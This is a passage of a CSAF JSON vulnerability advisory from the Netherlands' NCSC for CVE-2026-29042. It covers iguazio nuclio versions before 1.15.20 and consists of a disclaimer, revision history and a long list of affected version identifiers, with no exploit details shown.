{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-29042",
        "tracking": {
            "current_release_date": "2026-03-27T08:44:41.970650Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-29042",
            "initial_release_date": "2026-03-04T21:51:01.034453Z",
            "revision_history": [
                {
                    "date": "2026-03-04T21:51:01.034453Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (5).| CWES updated (1)."
                },
                {
                    "date": "2026-03-04T21:51:08.569005Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-05T00:12:51.092785Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (4).| CWES updated (1)."
                },
                {
                    "date": "2026-03-05T00:12:56.668279Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-06T07:25:13.382508Z",
                    "number": "5",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)."
                },
                {
                    "date": "2026-03-06T07:25:19.497076Z",
                    "number": "6",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-06T07:39:46.443395Z",
                    "number": "7",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (4).| CWES updated (1)."
                },
                {
                    "date": "2026-03-06T07:39:55.227338Z",
                    "number": "8",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-06T11:35:09.306180Z",
                    "number": "9",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-06T14:52:26.982162Z",
                    "number": "10",
                    "summary": "Source created.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-06T14:52:31.219816Z",
                    "number": "11",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-06T22:39:36.545730Z",
                    "number": "12",
                    "summary": "References created (1)."
                },
                {
                    "date": "2026-03-07T00:12:56.797455Z",
                    "number": "13",
                    "summary": "References created (1)."
                },
                {
                    "date": "2026-03-09T20:39:20.292968Z",
                    "number": "14",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-03-10T21:26:19.949651Z",
                    "number": "15",
                    "summary": "CVSS created.| Products created (1).| Product Identifiers created (1).| Exploits created (1)."
                },
                {
                    "date": "2026-03-10T21:26:23.145404Z",
                    "number": "16",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-11T14:56:12.622224Z",
                    "number": "17",
                    "summary": "EPSS updated."
                },
                {
                    "date": "2026-03-11T14:56:23.996720Z",
                    "number": "18",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-12T14:59:18.089045Z",
                    "number": "19",
                    "summary": "EPSS updated."
                },
                {
                    "date": "2026-03-13T01:18:01.672369Z",
                    "number": "20",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-13T02:17:56.504802Z",
                    "number": "21",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-20T09:35:51.237060Z",
                    "number": "22",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-20T09:35:54.062166Z",
                    "number": "23",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-25T18:15:09.616116Z",
                    "number": "24",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| References created (5)."
                },
                {
                    "date": "2026-03-25T18:15:12.583196Z",
                    "number": "25",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-25T19:02:47.758701Z",
                    "number": "26",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (268).| References created (6).| CWES updated (1)."
                },
                {
                    "date": "2026-03-27T08:08:18.070465Z",
                    "number": "27",
                    "summary": "NCSC Score updated."
                }
            ],
            "status": "interim",
            "version": "27"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<1.15.20",
                                "product": {
                                    "name": "vers:unknown/<1.15.20",
                                    "product_id": "CSAFPID-5778684",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:iguazio:nuclio:*:*:*:*:*:*:*:*"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "nuclio"
                    }
                ],
                "category": "vendor",
                "name": "iguazio"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.0",
                                "product": {
                                    "name": "vers:unknown/0.1.0",
                                    "product_id": "CSAFPID-5908758"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.2.0",
                                "product": {
                                    "name": "vers:unknown/0.2.0",
                                    "product_id": "CSAFPID-5908759"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.2.1",
                                "product": {
                                    "name": "vers:unknown/0.2.1",
                                    "product_id": "CSAFPID-5908760"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.2.2",
                                "product": {
                                    "name": "vers:unknown/0.2.2",
                                    "product_id": "CSAFPID-5908761"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.2.3",
                                "product": {
                                    "name": "vers:unknown/0.2.3",
                                    "product_id": "CSAFPID-5908762"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.2.4",
                                "product": {
                                    "name": "vers:unknown/0.2.4",
                                    "product_id": "CSAFPID-5908763"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.2.5",
                                "product": {
                                    "name": "vers:unknown/0.2.5",
                                    "product_id": "CSAFPID-5908764"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.2.6",
                                "product": {
                                    "name": "vers:unknown/0.2.6",
                                    "product_id": "CSAFPID-5908765"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.2.7",
                                "product": {
                                    "name": "vers:unknown/0.2.7",
                                    "product_id": "CSAFPID-5908766"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.2.8",
                                "product": {
                                    "name": "vers:unknown/0.2.8",
                                    "product_id": "CSAFPID-5908767"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.2.9",
                                "product": {
                                    "name": "vers:unknown/0.2.9",
                                    "product_id": "CSAFPID-5908768"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.3.0",
                                "product": {
                                    "name": "vers:unknown/0.3.0",
                                    "product_id": "CSAFPID-5908769"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.3.1",
                                "product": {
                                    "name": "vers:unknown/0.3.1",
                                    "product_id": "CSAFPID-5908770"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.3.2",
                                "product": {
                                    "name": "vers:unknown/0.3.2",
                                    "product_id": "CSAFPID-5908771"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.3.3",
                                "product": {
                                    "name": "vers:unknown/0.3.3",
                                    "product_id": "CSAFPID-5908772"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.3.4",
                                "product": {
                                    "name": "vers:unknown/0.3.4",
                                    "product_id": "CSAFPID-5908773"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.4.0",
                                "product": {
                                    "name": "vers:unknown/0.4.0",
                                    "product_id": "CSAFPID-5908774"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.5.0",
                                "product": {
                                    "name": "vers:unknown/0.5.0",
                                    "product_id": "CSAFPID-5908775"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.5.1",
                                "product": {
                                    "name": "vers:unknown/0.5.1",
                                    "product_id": "CSAFPID-5908776"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.5.10",
                                "product": {
                                    "name": "vers:unknown/0.5.10",
                                    "product_id": "CSAFPID-5908777"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.5.11",
                                "product": {
                                    "name": "vers:unknown/0.5.11",
                                    "product_id": "CSAFPID-5908778"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.5.12",
                                "product": {
                                    "name": "vers:unknown/0.5.12",
                                    "product_id": "CSAFPID-5908779"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.5.13",
                                "product": {
                                    "name": "vers:unknown/0.5.13",
                                    "product_id": "CSAFPID-5908780"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.5.14",
                                "product": {
                                    "name": "vers:unknown/0.5.14",
                                    "product_id": "CSAFPID-5908781"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.5.15",
                                "product": {
                                    "name": "vers:unknown/0.5.15",
                                    "product_id": "CSAFPID-5908782"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.5.2",
                                "product": {
                                    "name": "vers:unknown/0.5.2",
                                    "product_id": "CSAFPID-5908783"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.5.3",
                                "product": {
                                    "name": "vers:unknown/0.5.3",
                                    "product_id": "CSAFPID-5908784"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.5.4",
                                "product": {
                                    "name": "vers:unknown/0.5.4",
                                    "product_id": "CSAFPID-5908785"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.5.5",
                                "product": {
                                    "name": "vers:unknown/0.5.5",
                                    "product_id": "CSAFPID-5908786"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.5.6",
                                "product": {
                                    "name": "vers:unknown/0.5.6",
                                    "product_id": "CSAFPID-5908787"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.5.7",
                                "product": {
                                    "name": "vers:unknown/0.5.7",
                                    "product_id": "CSAFPID-5908788"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.5.8",
                                "product": {
                                    "name": "vers:unknown/0.5.8",
                                    "product_id": "CSAFPID-5908789"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.5.9",
                                "product": {
                                    "name": "vers:unknown/0.5.9",
                                    "product_id": "CSAFPID-5908790"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.7.0",
                                "product": {
                                    "name": "vers:unknown/0.7.0",
                                    "product_id": "CSAFPID-5908791"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.7.1",
                                "product": {
                                    "name": "vers:unknown/0.7.1",
                                    "product_id": "CSAFPID-5908792"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.7.10",
                                "product": {
                                    "name": "vers:unknown/0.7.10",
                                    "product_id": "CSAFPID-5908793"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.7.11",
                                "product": {
                                    "name": "vers:unknown/0.7.11",
                                    "product_id": "CSAFPID-5908794"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.7.2",
                                "product": {
                                    "name": "vers:unknown/0.7.2",
                                    "product_id": "CSAFPID-5908795"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.7.3",
                                "product": {
                                    "name": "vers:unknown/0.7.3",
                                    "product_id": "CSAFPID-5908796"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.7.4",
                                "product": {
                                    "name": "vers:unknown/0.7.4",
                                    "product_id": "CSAFPID-5908797"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.7.5",
                                "product": {
                                    "name": "vers:unknown/0.7.5",
                                    "product_id": "CSAFPID-5908798"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.7.6",
                                "product": {
                                    "name": "vers:unknown/0.7.6",
                                    "product_id": "CSAFPID-5908799"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.7.7",
                                "product": {
                                    "name": "vers:unknown/0.7.7",
                                    "product_id": "CSAFPID-5908800"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.7.8",
                                "product": {
                                    "name": "vers:unknown/0.7.8",
                                    "product_id": "CSAFPID-5908801"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.7.9",
                                "product": {
                                    "name": "vers:unknown/0.7.9",
                                    "product_id": "CSAFPID-5908802"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.0.0",
                                "product": {
                                    "name": "vers:unknown/1.0.0",
                                    "product_id": "CSAFPID-5908803"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.0.1",
                                "product": {
                                    "name": "vers:unknown/1.0.1",
                                    "product_id": "CSAFPID-5908804"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.1.0",
                                "product": {
                                    "name": "vers:unknown/1.1.0",
                                    "product_id": "CSAFPID-5908805"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.1.1",
                                "product": {
                                    "name": "vers:unknown/1.1.1",
                                    "product_id": "CSAFPID-5908806"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.1.10",
                                "product": {
                                    "name": "vers:unknown/1.1.10",
                                    "product_id": "CSAFPID-5908807"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.1.13",
                                "product": {
                                    "name": "vers:unknown/1.1.13",
                                    "product_id": "CSAFPID-5908808"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.1.14",
                                "product": {
                                    "name": "vers:unknown/1.1.14",
                                    "product_id": "CSAFPID-5908809"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.1.15",
                                "product": {
                                    "name": "vers:unknown/1.1.15",
                                    "product_id": "CSAFPID-5908810"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.1.16",
                                "product": {
                                    "name": "vers:unknown/1.1.16",
                                    "product_id": "CSAFPID-5908811"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.1.17",
                                "product": {
                                    "name": "vers:unknown/1.1.17",
                                    "product_id": "CSAFPID-5908812"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.1.18",
                                "product": {
                                    "name": "vers:unknown/1.1.18",
                                    "product_id": "CSAFPID-5908813"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.1.19",
                                "product": {
                                    "name": "vers:unknown/1.1.19",
                                    "product_id": "CSAFPID-5908814"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.1.2",
                                "product": {
                                    "name": "vers:unknown/1.1.2",
                                    "product_id": "CSAFPID-5908815"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.1.20",
                                "product": {
                                    "name": "vers:unknown/1.1.20",
                                    "product_id": "CSAFPID-5908816"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.1.3",
                                "product": {
                                    "name": "vers:unknown/1.1.3",
                                    "product_id": "CSAFPID-5908817"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.1.4",
                                "product": {
                                    "name": "vers:unknown/1.1.4",
                                    "product_id": "CSAFPID-5908818"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.1.5",
                                "product": {
                                    "name": "vers:unknown/1.1.5",
                                    "product_id": "CSAFPID-5908819"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.1.6",
                                "product": {
                                    "name": "vers:unknown/1.1.6",
                                    "product_id": "CSAFPID-5908820"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.1.7",
                                "product": {
                                    "name": "vers:unknown/1.1.7",
                                    "product_id": "CSAFPID-5908821"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.1.8",
                                "product": {
                                    "name": "vers:unknown/1.1.8",
                                    "product_id": "CSAFPID-5908822"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.1.9",
                                "product": {
                                    "name": "vers:unknown/1.1.9",
                                    "product_id": "CSAFPID-5908823"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.10.0",
                                "product": {
                                    "name": "vers:unknown/1.10.0",
                                    "product_id": "CSAFPID-5908824"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.10.1",
                                "product": {
                                    "name": "vers:unknown/1.10.1",
                                    "product_id": "CSAFPID-5908825"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.10.2",
                                "product": {
                                    "name": "vers:unknown/1.10.2",
                                    "product_id": "CSAFPID-5908826"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.10.3",
                                "product": {
                                    "name": "vers:unknown/1.10.3",
                                    "product_id": "CSAFPID-5908827"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.10.4",
                                "product": {
                                    "name": "vers:unknown/1.10.4",
                                    "product_id": "CSAFPID-5908828"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.10.5",
                                "product": {
                                    "name": "vers:unknown/1.10.5",
                                    "product_id": "CSAFPID-5908829"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.10.6",
                                "product": {
                                    "name": "vers:unknown/1.10.6",
                                    "product_id": "CSAFPID-5908830"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.10.7",
                                "product": {
                                    "name": "vers:unknown/1.10.7",
                                    "product_id": "CSAFPID-5908831"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.10.8",
                                "product": {
                                    "name": "vers:unknown/1.10.8",
                                    "product_id": "CSAFPID-5908832"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.11.0",
                                "product": {
                                    "name": "vers:unknown/1.11.0",
                                    "product_id": "CSAFPID-5908833"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.11.1",
                                "product": {
                                    "name": "vers:unknown/1.11.1",
                                    "product_id": "CSAFPID-5908834"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.11.10",
                                "product": {
                                    "name": "vers:unknown/1.11.10",
                                    "product_id": "CSAFPID-5908835"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.11.11",
                                "product": {
                                    "name": "vers:unknown/1.11.11",
                                    "product_id": "CSAFPID-5908836"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.11.12",
                                "product": {
                                    "name": "vers:unknown/1.11.12",
                                    "product_id": "CSAFPID-5908837"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.11.13",
                                "product": {
                                    "name": "vers:unknown/1.11.13",
                                    "product_id": "CSAFPID-5908838"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.11.14",
                                "product": {
                                    "name": "vers:unknown/1.11.14",
                                    "product_id": "CSAFPID-5908839"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.11.15",
                                "product": {
                                    "name": "vers:unknown/1.11.15",
                                    "product_id": "CSAFPID-5908840"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.11.16",
                                "product": {
                                    "name": "vers:unknown/1.11.16",
                                    "product_id": "CSAFPID-5908841"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.11.17",
                                "product": {
                                    "name": "vers:unknown/1.11.17",
                                    "product_id": "CSAFPID-5908842"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.11.18",
                                "product": {
                                    "name": "vers:unknown/1.11.18",
                                    "product_id": "CSAFPID-5908843"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.11.19",
                                "product": {
                                    "name": "vers:unknown/1.11.19",
                                    "product_id": "CSAFPID-5908844"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.11.2",
                                "product": {
                                    "name": "vers:unknown/1.11.2",
                                    "product_id": "CSAFPID-5908845"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.11.20",
                                "product": {
                                    "name": "vers:unknown/1.11.20",
                                    "product_id": "CSAFPID-5908846"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.11.21",
                                "product": {
                                    "name": "vers:unknown/1.11.21",
                                    "product_id": "CSAFPID-5908847"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.11.22",
                                "product": {
                                    "name": "vers:unknown/1.11.22",
                                    "product_id": "CSAFPID-5908848"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.11.23",
                                "product": {
                                    "name": "vers:unknown/1.11.23",
                                    "product_id": "CSAFPID-5908849"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.11.24",
                                "product": {
                                    "name": "vers:unknown/1.11.24",
                                    "product_id": "CSAFPID-5908850"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.11.3",
                                "product": {
                                    "name": "vers:unknown/1.11.3",
                                    "product_id": "CSAFPID-5908851"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.11.4",
                                "product": {
                                    "name": "vers:unknown/1.11.4",
                                    "product_id": "CSAFPID-5908852"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.11.5",
                                "product": {
                                    "name": "vers:unknown/1.11.5",
                                    "product_id": "CSAFPID-5908853"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.11.6",
                                "product": {
                                    "name": "vers:unknown/1.11.6",
                                    "product_id": "CSAFPID-5908854"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.11.7",
                                "product": {
                                    "name": "vers:unknown/1.11.7",
                                    "product_id": "CSAFPID-5908855"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.11.8",
                                "product": {
                                    "name": "vers:unknown/1.11.8",
                                    "product_id": "CSAFPID-5908856"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.11.9",
                                "product": {
                                    "name": "vers:unknown/1.11.9",
                                    "product_id": "CSAFPID-5908857"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.12.0",
                                "product": {
                                    "name": "vers:unknown/1.12.0",
                                    "product_id": "CSAFPID-5908858"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.12.1",
                                "product": {
                                    "name": "vers:unknown/1.12.1",
                                    "product_id": "CSAFPID-5908859"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.12.10",
                                "product": {
                                    "name": "vers:unknown/1.12.10",
                                    "product_id": "CSAFPID-5908860"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.12.11",
                                "product": {
                                    "name": "vers:unknown/1.12.11",
                                    "product_id": "CSAFPID-5908861"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.12.12",
                                "product": {
                                    "name": "vers:unknown/1.12.12",
                                    "product_id": "CSAFPID-5908862"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.12.13",
                                "product": {
                                    "name": "vers:unknown/1.12.13",
                                    "product_id": "CSAFPID-5908863"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.12.14",
                                "product": {
                                    "name": "vers:unknown/1.12.14",
                                    "product_id": "CSAFPID-5908864"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.12.2",
                                "product": {
                                    "name": "vers:unknown/1.12.2",
                                    "product_id": "CSAFPID-5908865"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.12.3",
                                "product": {
                                    "name": "vers:unknown/1.12.3",
                                    "product_id": "CSAFPID-5908866"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.12.4",
                                "product": {
                                    "name": "vers:unknown/1.12.4",
                                    "product_id": "CSAFPID-5908867"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.12.5",
                                "product": {
                                    "name": "vers:unknown/1.12.5",
                                    "product_id": "CSAFPID-5908868"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.12.6",
                                "product": {
                                    "name": "vers:unknown/1.12.6",
                                    "product_id": "CSAFPID-5908869"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.12.7",
                                "product": {
                                    "name": "vers:unknown/1.12.7",
                                    "product_id": "CSAFPID-5908870"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.12.8",
                                "product": {
                                    "name": "vers:unknown/1.12.8",
                                    "product_id": "CSAFPID-5908871"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.12.9",
                                "product": {
                                    "name": "vers:unknown/1.12.9",
                                    "product_id": "CSAFPID-5908872"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.13.0",
                                "product": {
                                    "name": "vers:unknown/1.13.0",
                                    "product_id": "CSAFPID-5908873"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.13.1",
                                "product": {
                                    "name": "vers:unknown/1.13.1",
                                    "product_id": "CSAFPID-5908874"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.13.2",
                                "product": {
                                    "name": "vers:unknown/1.13.2",
                                    "product_id": "CSAFPID-5908875"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.13.3",
                                "product": {
                                    "name": "vers:unknown/1.13.3",
                                    "product_id": "CSAFPID-5908876"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.13.4",
                                "product": {
                                    "name": "vers:unknown/1.13.4",
                                    "product_id": "CSAFPID-5908877"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.14.0",
                                "product": {
                                    "name": "vers:unknown/1.14.0",
                                    "product_id": "CSAFPID-5908878"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.14.1",
                                "product": {
                                    "name": "vers:unknown/1.14.1",
                                    "product_id": "CSAFPID-5908879"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.14.2",
                                "product": {
                                    "name": "vers:unknown/1.14.2",
                                    "product_id": "CSAFPID-5908880"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.14.3",
                                "product": {
                                    "name": "vers:unknown/1.14.3",
                                    "product_id": "CSAFPID-5908881"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.14.5",
                                "product": {
                                    "name": "vers:unknown/1.14.5",
                                    "product_id": "CSAFPID-5908882"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.14.6",
                                "product": {
                                    "name": "vers:unknown/1.14.6",
                                    "product_id": "CSAFPID-5908883"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.14.7",
                                "product": {
                                    "name": "vers:unknown/1.14.7",
                                    "product_id": "CSAFPID-5908884"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/1.14.8",
